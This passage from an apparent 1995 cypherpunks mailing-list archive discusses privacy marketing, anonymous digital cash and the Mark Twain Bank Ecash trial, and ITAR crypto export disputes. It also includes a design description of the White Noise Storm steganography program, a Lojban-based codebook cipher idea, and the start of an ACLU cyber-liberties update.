>less complete) one which largely contradicts your view.
>
>Either future is plausible.  I think the key issue here is risk.  The
>commercial market for transaction detail exists today.  Call it a mature
>industry.  The market for individual digital privacy has been identified at a
>general level, but, as you point out, has not exactly crystallized.  Call it
>an embryonic industry.
>
>Does the former need to die in order for the latter to gain ground?  Probably
>not.  There's a lot of mutual dependence here.  Each needs the other to be
>relevant - kind of a Yin/Yang thing.  Depending upon how the regulatory
>environment shapes up, it may be quite possible that both are thriving
>businesses in the future, with transaction service providers enjoying revenue
>streams from both selling data and selling anti-data (privacy).   Look at
>Caller ID and Caller ID Blocking services for an historical precedent.
>
>- Art
>
>
>Art Hutchinson                                        E-mail:
>hutchinson@ncri.com
>Senior Consultant                                        Phone: (617) 654-0635
>Northeast Consulting Resources, Inc.        FAX: (617) 654-0654
>One Liberty Square                                     WWW: http://www.ncri.com
>Boston, MA 02160

This dovetails into a conversation currently going on in inside the
cypherpunks alias, here is a reply I posted to a query about Transaction
Models, and security or anomymous status of the transaction initiator or
closer.


--- Snip ---


>I must disagre here and side with *gasp* FC.

Ughhh, Me too..., Dr. Fred scores 2 Points!

>If your so called *secure* server happens to get broken into by grace of
>god, you want to know at least where the attack came from. If Netscape
>wants to hide internet hostnames they would to well setting up to DNS
>servers, one for internal resolutions where IPs resolve to their real
>hostname, and one in front of the firewall that resolves all IP's to
>unkown.netscape.com.


I think there are reallty two bigger conceptual issues up for bashing about
here, and they are different. It is unlikely that they can be by the same
protocol... They both are valid transaction models and must be met.

The one - Authentication Based transactions, i.e. I am doing *stuff* from a
"known" system or "authenticated channel". These transactions are based
upon a level of trust that I say I am who I am and that my "tresources" are
as they are protrayed to be. Clearly there is an electronic trail generated
here. This is the "credit card" model.

and

The other, -  What I now call "Unauthenicated transactions" are based upon
the actual resource's being authenticated rather than myself being
authenticated.

-----

Hence if you follow this model to extrapolate that these two types of
"environments" exist, that of "known and trusted users" and that of
"unknown users, but trusted cash". They are inb and of itself what will
drive the need to both collect and enforce privacy for both types of
transactions.

IMHO - Anything less just wont fly long term. This concept of collecting
client data has to be a part of the "Known Entity" Transaction Models and
relegated to stay within that context. "Unknown Entity" transaction
processing will have to be made avalaiable as well with anonimity being
insured as part of the process model.


Todd





Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Oct 95 11:14:27 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Reformated: How secure....
In-Reply-To: <199510251759.NAA26251@universe.digex.net>
Message-ID: <199510251814.OAA09113@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
> "Perry E. Metzger" writes:
> >Amateurs pretending that they are professionals going out and selling
> >snake-oil crypto are one of the biggest threats in our business.
> 
> and then...
> 
> >I suspect it would take a real cryptographer very little effort to
> >break your system, but that no one will bother doing so because it
> >isn't really worth anyone's time.
> 
> Well, Perry, if it's really such a threat, isn't it worth someone's
> time to combat it?
> 
> Wasn't that point driven home by the Netscape PRNG problems?

Netscape is in wide use. If a substantial number of people bothered to
use the Privsoft, then it might be worth breaking it. As it stands, I
don't think its worth my while. Maybe someone out there wants to
bother to do it as an exercise. It unfortunately has a bit of added
complexity because you have to learn a bit about image statistics in
order to do a good job of segregating the images, but it also looks
like you might be able to use multiple anagramming to get a nice
handle on the thing so your statistics don't have to be particularly
good.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Oct 95 11:18:17 PDT
To: cypherpunks@toad.com
Subject: Re: arg
In-Reply-To: <199510251801.TAA27975@utopia.hacktic.nl>
Message-ID: <199510251818.OAA09128@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Why do you care, Mr. Anonymous. Most of the message was on
cryptography, and if he wants to put in a .signature that happens to
slam the idiocy of our semi-socialist government, well, let him. You
can put in .signatures that praise it if you like. Just keep most of
the message on topic.

Anonymous writes:
> Frissell:
> 
> "The average seasoned citizen pays a higher percentage of his income for
> medical expenses today than he did in 1964 before the passage of Medicaid."
> 
>       Do you set aside a quiet hour every day to think up this crap?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Oct 95 11:34:14 PDT
To: cypherpunks@toad.com
Subject: (www-b) (fwd) Privacy Marketing
Message-ID: <v02120d03acb4335bba19@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Nick's on a roll now...

Cheers,
Bob Hettinga



--- begin forwarded text

From: szabo@netcom.com (Nick Szabo)
Subject: Privacy Marketing
To: philipw.nrd@cbo.gov (PHILIP WEBRE)
Date: Wed, 25 Oct 1995 09:26:23 -0700 (PDT)
Cc: www-buyinfo@allegra.att.com
Mime-Version: 1.0


Most Internet businesses, especially the Web software and
payment systems providers, are severely underestimating the market
for privacy features that is out there.  Consider:

* A recent general survey showed that 83% of Americans are very
concerned about their privacy on the "Information Superhighway".
One can expect even stronger figures from European customers, which
have more first-hand experience with private data, much of it
originally compiled for innocuous reasons, being used for
political repression.  The vast majority of our customers are
concerned about privacy.

* Marketing surveys on privacy that are both detailed and accurate
are hard to come by, because customers who care more about their privacy
tend to dislike filling out detailed forms (even if they claim to be
anonymous).

* Over half the BBS, and potentially the Internet, online service market
is in controversial services, where customers are even more concerned
about privacy than average.

* Privacy, once considered merely a political issue, is now being recognized
for its more important aspect, as a market differentiator and value-add.
Marketers correctly recognize that government "privacy regulations" mean
much less privacy for businesses if it is to be enforced, and the voters no
longer expect such laws to have any teeth in the face of modern
technology.  That hardly means that customers are not concerned about it, as
the numbers show.  The alternative to regulation is market solutions.
Recognize that many customers do want privacy, give them what they want,
and contrast yourself to your competitor. Making visible the ways your
competitor is violating their customers' privacy will become a powerful
marketing strategy.  This strategy was used rather timidly, and inaccurately,
by AT&T against MCI, where it nevertheless had great success.  (Inaccurate
because all major phone companies compile lists of who calls whom,
and use them for marketing as well as billing -- MCI was simply being more
honest about it).  Used boldly and accurately, privacy marketing has
vast potential to upset competitors who rely too much on marketing
data and not enough on empathy with the human customer.  For an idea
of what such a marketing campaign might be like, imagine combining
Apple "1984" Mac ads, one of the most effective campaigns in history,
with the AT&T vs. MCI campaign, to sell products and services that
in fact do protect customer privacy where the competition does not.

* Most Americans do _not_ participate in frequent flier and similar
customer tracking programs.  Many who do participate don't realize
the extent to which their lifestyle is tracked, since these actions
are performed on remote databases, well hidden from the customer.
If customers aren't concerned about their privacy, then why the need for
all the distracting gimmicks and giveaways?  Why not just promote these
programs straightforwardly to the customer as "Customer Tracking
Programs"?  A competitor who can provide a privacy protecting solution
can do just that, damaging these tracking programs severely.

* It is ludicrous to argue that cash transactions, which leave no
identified paper trail, provide no practical privacy.  In fact they
prevent detailed compilation of lifestyle habits, by (a) not
depending on identity to settle the transaction, (b) making
identity tracking, where it occurs, a visible, separate process, and
(c) making it too expensive to track identity via the payment system itself,
except in extreme, very rare cases.  In practice, this means that cash
customers don't get their lifestyles described in detail in remote
databases, while non-confidential electronic payers increasingly do.
Eventually this sharp difference in outcome will feed back to the
customer, greatly increasing the demand for cash over non-confidential
electronic payment.

* A big challenge for vendors value-adding privacy is to accurately
communicate these privacy features, through both the user interface and their
marketing, while debunking fraudulent claims (such as calling
non-confidential payment systems "cash") and exposing the privacy
violating actions of their competitors.

I conclude that privacy marketing will be an important value-add for
Internet commerce.  It will be a terrific way to gain market share at
the expense of the competition  -- or to lose much of your market share,
if you find yourself on the wrong end of a privacy campaign.


Nick Szabo                              szabo@netcom.com
Consultant, Internet Commerce & Security
IBM, Sequent, DigiCash, Agorics
Nine years experience on the Internet

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 25 Oct 95 12:47:44 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510251945.OAA25027@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Even if the T-shirts are a joke, it seems like applying for an export
license is a win-win proposition.  If the government denies the license,
they end up looking extremely silly and it's easier to point out to
Joe Sixpack (or a judge) how silly ITAR is w.r.t. cryptography.  If they
grant the license or say one isn't necessary, it might open up the way for
"cypherpunk party-streamers" which also happens to be your favorite crypto
program on colored paper tape or perhaps even limited edition, hand painted,
collectable cypherpunk CDs containing mostly music but with a data track or
two.

The only bad response would be none at all, so I think pushing for one
is worthwhile even if the answer is "that's a frivolous request".


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 25 Oct 95 11:55:00 PDT
To: leonardr@aladdinsys.com (Leonard Rosenthol)
Subject: Re: Quick commercial package question
Message-ID: <v02120d02acb446206c09@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 AM 10/25/95, Leonard Rosenthol wrote:

>At 10:57 PM 10/24/95, Marshall Clow wrote:
>>>        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin

<...>

>        If you know the person who wrote or posted the information, please
>feel free to forward my message along to him.

        I don't know the person, but I posted your note--and, BTW, thanks
for responding--to alt.hackintosh, where the above web page proffering this
pseudo-crack is regularly mentioned; I know that "abusby" monitors the
group (and maintains a big hacking BBS), so hopefully he'll pull the crack
from circulation.

Cheers. And thanks, also, for all of your very excellent work.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 25 Oct 95 12:01:59 PDT
To: hallam@w3.org
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
Message-ID: <199510251901.PAA28429@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


For those interested in the first bank to back Ecash:

Mark Twain Bank opened to serve the wealthy suburbs of Saint Louis (Ladue
and Town & Country) a few years ago.  It was meant to be a public "private
bank" for sophisticated customers.  

A few years ago when the rules were eased, it started offering accounts and
CDs denominated in 25 foreign currencies.  These accounts were meant for
international investors and business types in the area.  They were
discovered by "hard money" newsletters and became popular with that crowd.
They have been the cheapest place to get foreign currency accounts in the
US.  Initially, the bank didn't realize that this sort of "hedge" market
existed but have since exploited it fairly well.

These accounts are FDIC insured up to $100,000.00 in $US equivalents.
Obviously, exchange losses are not covered by FDIC insurance.

The Ecash trial involves opening a World Currency Access Account which *is*
FDIC insured and using it to fund your Ecash account which is *not* insured.
They are treating the Ecash Mint part of their operations and the various
customer Ecash accounts as investment accounts (hence the investor
sophistication disclosure questions on the application form).  

Unanswered questions --- What will the SEC say?

Mark Twain seems to be carrying on the fine old tradition of Saint Louis
banks being a bit independent and out in front of the crowd.  Other examples
include Southwest Bank always leading the nation on Prime Rate changes and
the Saint Louis Federal Reserve Bank (the only FRB to publish a hard money
newsletter).

I may wait for the Swedish Postal Bank to start offering its Ecash accounts
just cause I like foreign climes.

DCF

"The Revolution will *not* be FDIC insured BTW." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 25 Oct 95 12:03:29 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: CJR returned to sender
In-Reply-To: <199510251652.MAA08998@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951025145947.21444H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995, Perry E. Metzger wrote:

> Michael Froomkin writes:
> {words to the effect of "enough already"}
> 
> I was unaware, Mr. Froomkin, that the legal system of our country had
> the right to arbitrarily ignore its own rules and refuse to answer a
> question. The munitions T-Shirt was not, in my opinion, substantially

Yes, it has an obligation to answer.

> more frivolous than Phil Karn's floppy, which was rejected. I do not

We disagree.

> believe that the state department has the right to reject such things
> by refusing to accept their mail, and I do not believe that they have

This assumes a conscious decision was made; I'm more inclined to think 
it's a screw up.  In any case, sending it registered mail, or by 
courrier, would remove the doubt.

> the right to violate their own proceedures. If someone asks "is this
> captain midnight decoder ring exportable" they are legally obligated
> to answer, one way or the other, unless we live under a government of
> men, and not laws.
> 
Yes.  I just hope the members of this list have more sense than to do 
frivolous things, although of course I defend their legal right to do 
so.  Of course, one part of being wise is picking the right fights.

This will be my last comment on this thread.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ali@eit.COM (Ali Bahreman)
Date: Wed, 25 Oct 95 15:33:00 PDT
To: ljo@ausys.se
Subject: Digital Cash, Privacy, Anonymity, Double spending protection and Cheating protection
Message-ID: <199510252228.PAA21470@penetralium.eit.com.>
MIME-Version: 1.0
Content-Type: text/plain


Let's think out loud here for a minute...  I am sending this to Cypherpunks to 
see if someone out there has already thought of a solution to this.

Alice wants to get a file from Bob and wants to pay him $1 using some Digital 
Cash scheme.

- Do we want Alice's identity to remain Anonymous (and Bob's too)? (Note that 
  this means that neither party knows who the other really is.  They could be 
  using aliases to conceal their real identity.)

- Do we want both Alice's & Bob's Privacy maintained in the interactions. (Note 
  the seperation of Privacy and Anonymity with the former referring to the fact
  that the transaction detail is only known between the parties involved.  The 
  transaction detail includes, knowledge of what was purchased, how many, and 
  in the ideal case between which parties!  Those parties could have used an 
  alias and therefore have remained Anonymous independent of whether their 
  Privacy was maintained.  Privacy also means more than simple confidentiality 
  because it may involve having a merchant, for example, not maintain a database
  of purchasing habbits, or if it does maintain such a database, keep it to 
  itself.)

- Do we want to prevent Alice from double spending (and Bob too)?

- Do we want to protect either party from cheating each other?

- Do we want a self-enforcing protocol?  (e.g. No need for Bob to verify the 
  e-coins with a Bank every time.)

- Do we want minimum book-keeping by each party for practical implementations?

- Have I missed more?  Tax, Export, etc (beyond the scope of this email ;-)


The question is can all of the above requirements be achieved?  AND Are they 
all required/desired? 

I know cryptography does wonders, but I ponder upon 1) the need to satisfy
all the above requirements, as well as 2) the feasability of such a solution.

At first glance, it appears that Anonymity and Double spending prevention are
contradictory.  You want to punish a double spender and you need to know their
identity to do that.  Also, Privacy covers a broader scope than cryptographic 
protocols can address (e.g. the merchant database.)  Finally, to prevent/punish cheating using a third party requires the loss of both Privacy and Anonymity as
the third party/judge is presented with the transaction details and asked to 
arbitrate.  Nevermind the other requirements for now... :-)

Please include me in all responses.  Thanks.

Ali




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 25 Oct 95 13:54:51 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510251617.MAA23789@panix.com>
Message-ID: <Pine.SV4.3.91.951025152409.3136C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


"States may not authorize arrest...for failing to produce identification..."
       Kolender v. Lawson 461 U.S. 352 (1983)

"...may not compel an answer and they must allow the person to leave 
after a reasonable brief period of time...."  - - ibid


California is the Ninth Circuit, no?  See, inter alia,  Martinelli v. 
City of Beaumont, 820 F.2nd 1491 (1987).

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 25 Oct 95 15:37:04 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank [good news]
Message-ID: <v02120d06acb4792cdc01@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Also note that, per a conversation w/Frank Trotter, there are
no minimum balances for those wanting to just establish ECash
accounts. There is also no significant operational difference
between merchant and customer accounts (it's mostly a matter
of fees.) Individuals can set up shops w/personal accounts.

Frank seems to think that he posted an announcement to this
effect to cypherpunks in the middle of the night last night. I
suspect he was tired.

(I'm apparently account number 10; the software should be put
 up for download by Marcel either tonight or tomorrow. He's
 apparently playing squash.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Wed, 25 Oct 95 12:48:41 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb3ab3f06021004ee7e@[205.199.118.202]>
Message-ID: <9510251948.AA28612@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 25 Oct 1995 09:08:15 -0700
   X-Sender: tcmay@mail.got.net
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   From: tcmay@got.net (Timothy C. May)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   At 6:35 AM 10/25/95, Timothy C. May wrote:
   >
   >(* Hal Abelson of MIT says there are possible export problems with the MIT
   >Press book on PGP, and MIT dropped plans for a version in a special OCR
   >font. So, I agree that _some_ books cross the line and look like pure
   >software. However, I continue to maintain that a badly-printed barcode is
   >just a joke, nothing more.)

   Brian LaMacchia sent me e-mail saying the MIT book _was_ published with the
   OCR font as originally planned. No response to their CJR request, submitted
   in Jan or Feb.

[Blatant plug for MIT Press...]

For reference, the title of the book is "PGP: Source Code and
Internals", ISBN 0-262-24039-4, hardcover, $60.00.  There are links to
the MIT Press pages from my keyserver home page
(http://www-swiss.ai.mit.edu/~bal/keyserver.html), or you can go to MIT
Press's site (http://www-mitpress.mit.edu/) and look under
Books/Computer Science.  Orders accepted over the net using either HTML
forms (SSL) or e-mail (PGP).

MIT Press is also selling "MIT PGP" T-Shirts, but I don't have pricing
or size information on them yet.  They have the logo from the book cover
on the front & back.  Front says "Mind your own business," back has a
copy of MIT Press's PGP public key (in ASCII-armored form).

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 25 Oct 95 13:03:23 PDT
To: cypherpunks@toad.com
Subject: Public key Steganography?
Message-ID: <Pine.SUN.3.91.951025155533.6824J-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain



The following are bits and pieces of a message I've sent to someone 
inquiring about stego...  It brought back the old idea I had about 
expanding WNS to do public key....  Would something like this be 
feasable?  the beginning of this is a description of what WNS does, 
followed by the public key idea...

---------- Forwarded message ----------

<<I am researching Steganography and related topics of a security course at 
George Mason University.  As part of my research, I am reviewing PC 
products that provide such services.  White Noise Storm (tm) which you 
developed in one such product.  I am interested in the kind of research 
you did to develop it (publications, readings, inspiration).  If you 
could point me to any documents I would be grateful.>>

Hi there,

Anyway to answer your questions, the idea of WNS came to me from the idea of
spread spectrum technology and frequency hopping, however, I added several
twists to it in order to improve security.  Instead of just having X channels
of communication which are multiplexed or changed with a fixed formula and
passkey, I have eight channels which are spread within a number of 8 bits*W
bytes channels.  W here represents a random sized window of W bytes.  Each of
these eight channels represents one single bit out of a whole byte, so each
Window holds one byte plus a bunch of unused bits.  These channels rotate
amongs themselves, for instance bit 1 might be swapped with bit 7, or all the
bits may rotate positions at once.  Further, these bits change location
within the window on the byte level.  The rules for these swaps (similar to
the substitution boxes in other cyphers) are dictated not only by your
passphrase - which is unlimited in length, but also by the previous window's
random data.   

This means that if you encrypt message M with key K two times, you get two
different cyphertexts, C.  C1 and C2 may be different, however, decrypted
with key K, both will yield the original message M.  This makes cryptanalysis
very hard because the same message will give you different cyphertexts each
time, thus making known cyphertext atacks useless.  (Of course if you don't
use random numbers, but rather the LSB's in an image, the same passphrase and
the same window size, you'll get the same cyphertext each time you run it -
which is one of the reasons you should destroy the original picture after
injecting it.  More about this later.)

Since the window size changes with each window, the bits both rotate among
themselves, and within the data window, it is close to impossible for an
attacker to guess where there is cyphertext data versus where there is random
data, which bit in that cyphertext represents what bit value, and in which
byte it is located in. 

The unused bits are actually random data when WNS is used by itself generated
by either a hardware random number generator, or by your compiler's random
functions which addmitedly aren't all that great.  However, if you are using
WNS for steganography, that random data is actually the least significant
bits of your original file, be it sound, or a picture or whatever.  An
injector is included for the PCX format because that is a format I am most
familiar with, however you may write your own for other media.

The reason I'm using live data out of the file you want to hide a message in
is so that the cyphertext produced by WNS closely matches the natural, native
LSB's of that file.  Also, WNS, when used with a large enough maximum window
size will give you a very secure stego channel since it will be very hard to
dected that 1 in say, 500 bits has been altered.  That's a bit extreme and
will waste a lot of data, but for small messages stored in very large
complex, noisy files, will look very much like the original image.

Another thing to throw off the attacker is that statistical fixing.  If WNS
writes a 1 bit over a 0 bit of an LSB file, it will look for an unused 1 bit
to write a zero over.  This balances the distribution of 0 and 1 bits to
match that of the original file as closely as possible, so that you cannot
use statistical analysis to even detect the presence of steganography, much
less break it.

Additionally, WNS's schema of steganography does give you a very strong
advantage: your recipient does not need to have the original picture or sound
in order to extract the hidden message.  There is a huge concern about this
since if, as some other algorithms require, your recipient needed to have the
original picture, you can bet that the bad guys would also have it and
compare the two and also be able to extract the message.  It is a good idea
for nobody to have the original image, not even you.  That is, scan something
in, inject your message in it, and destroy the original.   If the bad guys
search your hard drive and find the original picture, they can compare it to
the one you've sent which contains the data, thus they are able to find out
which bits WNS has changed, and possibly analyze the algorithm to see which
passphrases would generate such bits, extract the passphrase and then the
message.

With the original pre-WNS210 version, it was possible to break an encrypted
message by decoding it repeatedly with the same password while changing one
bit at a time in a window so as to find out which bits WNS wrote and which
were random, however this brute force method is a lot worse than most brute
force methods because given a stream of bits, and an unlimited password size
you have numbits^numpasswords combinations to work with - a very huge space
size for bruting, even for small messages.

However, this version uses not only the previous window's plain-text, but the
current window's unused random data bits to form the next window, that is in
a sense the algorithm is recursive.  (Not that the encryption function calls
itself, but rather it uses the previous window to form the next.)

Keep in mind that no-one, to my knowledge has done a differential
cryptanalysis or any other formal attempt to break this code.  It is possible
that the boys at the NSA would attempt this if they thought it was a threat
to them, but I haven't seen anyone report any weaknesses in this algorithm.
 This is why I suggest that whatever you send with WNS be compressed and then
encrypted with something like PGP first.  That extra bit of entropy generated
by first compressing, and then by encrypting with RSA and IDEA will increase
the entropy in your cyphertext even if the LSB's from the host picture aren't
all that random.

Related subjects from which I was inspired to write WNS: random numbers, the
sliding window protocols such as Zmodem which change their window size
depending on how noisy the channel is - WNS changes the window size to
improve security, not to help against noise - in fact, if you change a single
byte in a WNS cyphertext, the rest of the message gets garbled completly.
 Spread spectrum and channel hopping radio communications, finite state
machine automatons, steganography and stealth in general, etc.

At the time I wrote this, I did not have any papers I used to write this
code, only my own knowledge of the above topics, things I learned in school
about automatons and spread spectrum, the Zmodem protocol description of DSZ,
etc.

I would like to sometime in the future expand WNS to use a public key system
instead of a symmetric key, but I haven't yet found a feasable way to do
this.  As is, you'd have to know your recipient's private key in order to
encrypt something to send them.  If you do, it beats the whole point of
public key encryption.  If you use their public key, everyone has access to
it, so it's a kind of a catch 22 here.

Using their public key as the inital WNS key, then using an RSA encrypted
block to send the session key for WNS will produce the RSA encrypted block -
while this is fairly strong, RSA might have some tell-tale signs that would
give away the presence of steganography in the message?  I'm not sure how
insecure or secure this would be, but so far it is the only idea I have.

This would basically work like this:

  1. pick a randomly generated session key for the IDEA cypher, call this K1
  2. pick a randomly generated session key for the 2nd part of the WNS
session, call this K2.
  3. Use the recipient's public key Pub for an RSA or Diffie-Hillman session
key exchange.
  4. Encrypt Sessionkey=RSA(K1+K2,Pub)
  5. Encrypt Sessionblock=WNS(Sessionkey,randomnumbers,Pub) and merge with
random numbers generating a random sized block.
  6. First encrypt blocks of your plaintext with idea using
cyphertext1=IDEA(plaintextblock,K1)
  7. Then encrypt and write cyphertext2=WNS(cyphertext1,randomnumbers,K2) to
the output file.
  8. Go to 6 until no more data to write.

To decrypt ( you are the recipient):

  1.  Set the session key to your public key Pub.
  2.  Decrypt the start of the stegoed picture using WNS and your public key
to get K1 and K2:
       K1+K2=WNSDecrypt(cyphertext2,Pub) -> here cyphertext2 comes from the
file
  3.  Decrypt next block of code using cyphertext1=WNSDecrypt(cyphertext2,K2)
  4.  Decrypt the cyphertext1 with IDEA
  plaintext=IDEADecrypt(cyphertext1,K1)
  5.  Goto 3 until no more data.

Problem is, how much does it weaken WNS to use your recipient's RSA's public
key as the initial WNS key not only in terms of security, but also in terms
of allowing the attacker to detect the presence of stego'ed data in your host
image?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 00:15:16 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510232334.TAA11134@universe.digex.net>
Message-ID: <199510250657.QAA10183@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Scott Brickner <sjb@universe.digex.net>
 
S.B. wrote:

...[lojban]...

Well, I don't know lojban, but I've had a glance at it...

...
> All "native" Lojban words are of entirely predictable forms.  "Root"
> words are all five characters containing three consonants and two
> vowels in one of two patters (CCVCV and CVCCV).  "Structure" words have
> four forms (VV, CV, CVV, and CV'V).  "Combining forms" have two forms
> (CVC and CV'C).  All other words are not "native" words (being either
...

.u'u I believe that you were wrong when you expressed a symbol for the
list of forms of structure words. There are also words of the form V'V.

On the other hand, however, not all letter combinations are permitted;
eg there are only fourteen dipthongs (of which only four are "normal").

> The grammar of the language is *so* regularized that they are able to
> give a YACC description for it.

Yeah, and a huge beast it is. If you can make a YACCable language with
one page of rules (say 16 :-) ), *then* I'll be impressed.

Would you believe two grammars for mathematical expressions? No? Good!
There are three (infix, prefix and postfix).

> A message written entirely using native Lojban words can be encrypted
> in a codebook fashion where the particular codebook to be used is a
...

You have to be careful here - the structure words (cmavo) are divided
into groups (selma'o) which have different gramatical functions.
You can't mix up members of different selma'o (in general), so you'd
have to permute within each separately.

Some of these selma'o have very few members (even just one) and/or
may of themselves reveal information.

> This system has the interesting property that *any* plaintext with the
> same grammatical structure is a potential encryption of a given
> cyphertext.
...

Yes, but the grammatical structure itself may reveal heaps.
(Except for trivial statements.)

...
> There's still the problem of borrowed words and proper names, which
...
> could be sent spelled-out.

Yup, including font changes, if memory serves!

> This works well in Lojban because it never changes word forms based on
> grammatical usage.  Most natural language declensions and conjugations
> would make the encrypted message ungrammatical, and make it *much* more
...

Not really; you just need to make sure that you conjugate the coded words.
(Ie substitute nouns for nouns, verbs for verbs, etc.)


In Esperanto, the normal words roots (those that need an ending) would
be easy enough to permute... For the rest, you'd have to be careful about
structure words like "cxu" (which turns the sentence into a question),
conjunctions etc which go at specific places of the sentence.

There's plenty enough prepositions to permute :-)

You can probably make do with 1000-2000 words in Esperanto, making
the codebook somewhat more manageable than in other languages.

On the other hand, you would probably have to be careful to delineate
the boundaries, as confusion could result (the breaking up of an E-a
word into the component roots is not necessarily unique, leading to puns
ranging from beautiful (diamanto) through the weird (amoro) to the horrible).
Perhaps that would be a feature, though?


Adiaux!

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI3fzSxV6mvvBgf5AQE2VAQAxVwmHaku0rwpGswl8RBZa8q4Xm/yv5wh
uMNPl1b4FXPeJplsGGRqBnwgOL0+zcAowKIvkVJBeg2zB95ZGFcQW5IKVRg7tnR8
vX8khTwnRG3y0NcvMdFjPwn38gu4j8gyvMRHk5/x9sM1228zqQ/+0FrMD063geVw
Q1476RGREq4=
=YhgP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Wed, 25 Oct 95 17:58:11 PDT
To: beeson@aclu.org
Subject: ACLU Cyber-Liberties Update
Message-ID: <951025170122_54177496@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------
October 25, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies at the state
and federal level.
-----------------------------------------------------------------
IN THIS ISSUE:

*  Universities Censor Student Internet Use

*  Conferees Named for Federal Online Indecency Legislation

*  Search for Plaintiffs Continues in Suit to Challenge Online
Indecency Legislation

*  Effect of Telco Bill on Universal Access

*  Conferences
-----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases/Issues)
-----------------------------------------------------------------
*    Universities Censor Student Internet Use

In a knee-jerk reaction to the cyber-porn scare, many universities
around the country have begun to enact policies
to regulate student Internet use.  The ACLU believes that
university censorship of student Internet usage is inconsistent
with the principles of academic freedom.  In addition, state
universities are required as state institutions to uphold the
free speech guarantees of the First Amendment.  The Internet
